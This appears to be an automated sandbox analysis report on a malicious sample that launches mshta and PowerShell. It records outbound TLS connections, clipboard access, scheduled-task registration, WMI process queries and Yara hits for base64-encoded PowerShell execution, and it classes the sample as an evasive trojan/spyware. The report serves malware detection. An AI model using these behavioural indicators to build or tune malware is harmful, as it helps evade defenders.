Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 172.67.223.7:443 -> 192.168.11.20:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.173:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49776 version: TLS 1.2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_004329C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_004329C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_0041B2E0 CreateDesktopW,

8_2_0041B2E0

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C9F758 NtResumeThread,		6_2_06C9F758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C9F750 NtResumeThread,		6_2_06C9F750

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00948050	3_2_00948050
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00948920	3_2_00948920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00947D08	3_2_00947D08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B7D30	6_2_006B7D30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B4640	6_2_006B4640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B4650	6_2_006B4650
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B4607	6_2_006B4607
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006BB7E8	6_2_006BB7E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0093A603	6_2_0093A603
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0093761E	6_2_0093761E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00937628	6_2_00937628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0093E708	6_2_0093E708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_009338F8	6_2_009338F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_009338E8	6_2_009338E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00938BED	6_2_00938BED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00938CCB	6_2_00938CCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00933E90	6_2_00933E90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00933E80	6_2_00933E80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00E0B180	6_2_00E0B180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C315F0	6_2_06C315F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C327F8	6_2_06C327F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C31917	6_2_06C31917
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C797A8	6_2_06C797A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C773B0	6_2_06C773B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C762C0	6_2_06C762C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C762B1	6_2_06C762B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C7F3F0	6_2_06C7F3F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C7C7F8	6_2_06C7C7F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C79799	6_2_06C79799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C773A0	6_2_06C773A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C7B8A8	6_2_06C7B8A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C718B0	6_2_06C718B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C7B8B8	6_2_06C7B8B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C77574	6_2_06C77574
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C90040	6_2_06C90040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C90006	6_2_06C90006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C97918	6_2_06C97918
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C97928	6_2_06C97928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E667B8	6_2_06E667B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E67328	6_2_06E67328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E66A30	6_2_06E66A30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E67639	6_2_06E67639
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E667A8	6_2_06E667A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E66B55	6_2_06E66B55
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E66875	6_2_06E66875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E60040	6_2_06E60040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E66020	6_2_06E66020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E6683A	6_2_06E6683A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E60006	6_2_06E60006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E67800	6_2_06E67800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E66010	6_2_06E66010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E66D21	6_2_06E66D21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_082E0022	6_2_082E0022
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_082E0040	6_2_082E0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_082EF6B0	6_2_082EF6B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00408850	8_2_00408850
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00423860	8_2_00423860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00438810	8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004218A0	8_2_004218A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042DA53	8_2_0042DA53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041B2E0	8_2_0041B2E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040ACF0	8_2_0040ACF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00417DEE	8_2_00417DEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00437DF0	8_2_00437DF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00409580	8_2_00409580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041759F	8_2_0041759F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043AEC0	8_2_0043AEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004266D0	8_2_004266D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041E7C0	8_2_0041E7C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00415799	8_2_00415799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041682D	8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004288CB	8_2_004288CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D880	8_2_0043D880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00430940	8_2_00430940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00403970	8_2_00403970
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00420939	8_2_00420939
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004179C1	8_2_004179C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004231C2	8_2_004231C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004241C0	8_2_004241C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043B1D0	8_2_0043B1D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004291DD	8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D980	8_2_0043D980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00405990	8_2_00405990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00422190	8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D997	8_2_0043D997
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D999	8_2_0043D999
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004091B0	8_2_004091B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042CA49	8_2_0042CA49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00416263	8_2_00416263
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040EA10	8_2_0040EA10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00415220	8_2_00415220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042CAD0	8_2_0042CAD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004252DD	8_2_004252DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00406280	8_2_00406280
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043DA80	8_2_0043DA80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041E290	8_2_0041E290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041CB40	8_2_0041CB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D34D	8_2_0043D34D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00426B50	8_2_00426B50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043DB60	8_2_0043DB60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00436B08	8_2_00436B08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042830D	8_2_0042830D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042CB11	8_2_0042CB11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00404320	8_2_00404320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042CB22	8_2_0042CB22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00425327	8_2_00425327
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00408330	8_2_00408330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043F330	8_2_0043F330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042A33F	8_2_0042A33F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040DBD9	8_2_0040DBD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00424380	8_2_00424380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041FC75	8_2_0041FC75
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041DC00	8_2_0041DC00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00429C2B	8_2_00429C2B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004291DD	8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004074F0	8_2_004074F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041148F	8_2_0041148F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042AC90	8_2_0042AC90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043ECA0	8_2_0043ECA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040CD46	8_2_0040CD46
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00437500	8_2_00437500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00422510	8_2_00422510
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00425E70	8_2_00425E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00436E74	8_2_00436E74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00427603	8_2_00427603
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00425E30	8_2_00425E30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004286C0	8_2_004286C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004236E2	8_2_004236E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00405EE0	8_2_00405EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041DE80	8_2_0041DE80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00402F50	8_2_00402F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00420F50	8_2_00420F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00438F59	8_2_00438F59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00406710	8_2_00406710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00423F20	8_2_00423F20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043F720	8_2_0043F720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00419F30	8_2_00419F30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004197C2	8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042DFE9	8_2_0042DFE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040A780	8_2_0040A780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00411F90	8_2_00411F90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00418792	8_2_00418792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043EFB0	8_2_0043EFB0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00408030 appears 42 times
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00414400 appears 65 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 3792
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 3792			Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 6.2.powershell.exe.7590000.1.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 6.2.powershell.exe.7590000.1.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'

Source: 6.2.powershell.exe.7590000.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.powershell.exe.7590000.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.win@26/9@5/7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

8_2_00437DF0

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Ruiexf

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvoifloc.let.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
